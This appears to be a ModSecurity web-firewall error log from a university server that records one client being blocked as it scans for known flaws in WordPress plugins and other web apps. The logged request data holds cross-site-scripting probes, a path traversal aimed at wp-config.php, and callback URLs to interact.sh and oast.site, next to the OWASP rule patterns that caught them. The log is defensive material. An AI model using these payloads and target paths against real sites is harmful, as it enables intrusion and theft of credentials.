[tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAnHQg4AAAAT"]
[Tue Aug 29 11:51:44.642582 2023] [:error] [pid 2517] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnVEe0AAAAB"]
[Tue Aug 29 11:51:45.544101 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnB5ZAAAAAJ"]
[Tue Aug 29 11:51:47.547661 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAnIljgAAAAV"]
[Tue Aug 29 11:51:48.681417 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAngCVoAAAAP"]
[Tue Aug 29 11:51:48.723148 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAfWOIwAAAAL"]
[Tue Aug 29 11:51:50.828058 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnIlkgAAAAV"]
[Tue Aug 29 11:51:51.537067 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAnf3mwAAAAM"]
[Tue Aug 29 11:51:51.654497 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAlUlmkAAAA0"]
[Tue Aug 29 11:51:53.723731 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAlUlnEAAAA0"]
[Tue Aug 29 11:51:53.948934 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAhoHSIAAAAl"]
[Tue Aug 29 11:51:54.606951 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15asCo-f0AAAmQ-2oAAAAb"]
[Tue Aug 29 11:51:55.733832 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAm80RcAAAAF"]
[Tue Aug 29 11:51:56.599395 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAmIbTgAAAAo"]
[Tue Aug 29 11:51:57.567942 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAlUlnkAAAA0"]
[Tue Aug 29 11:51:58.649111 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnn1-QAAAAe"]
[Tue Aug 29 11:51:59.555010 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAhoHSoAAAAl"]
[Tue Aug 29 11:51:59.577602 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAm@51cAAAAH"]
[Tue Aug 29 11:52:01.556410 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnqj@IAAAAC"]
[Tue Aug 29 11:52:02.711036 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAjdQZUAAAAZ"]
[Tue Aug 29 11:52:02.724247 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAnh6O4AAAAS"]
[Tue Aug 29 11:52:02.764487 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAnIlm4AAAAV"]
[Tue Aug 29 11:52:02.777514 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAni@9wAAAAU"]
[Tue Aug 29 11:52:04.820436 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAn0GaEAAAAa"]
[Tue Aug 29 11:52:04.896359 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0nc3w38ped177f.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0nc3w38ped177f.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAnd3DsAAAAI"]
[Tue Aug 29 11:52:05.651033 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAfWOKsAAAAL"]
[Tue Aug 29 11:52:06.611531 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAoAkuUAAAAC"]
[Tue Aug 29 11:52:06.631319 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAhoHT0AAAAl"]
[Tue Aug 29 11:52:08.543626 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAn40zAAAAAW"]
[Tue Aug 29 11:52:08.691565 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity 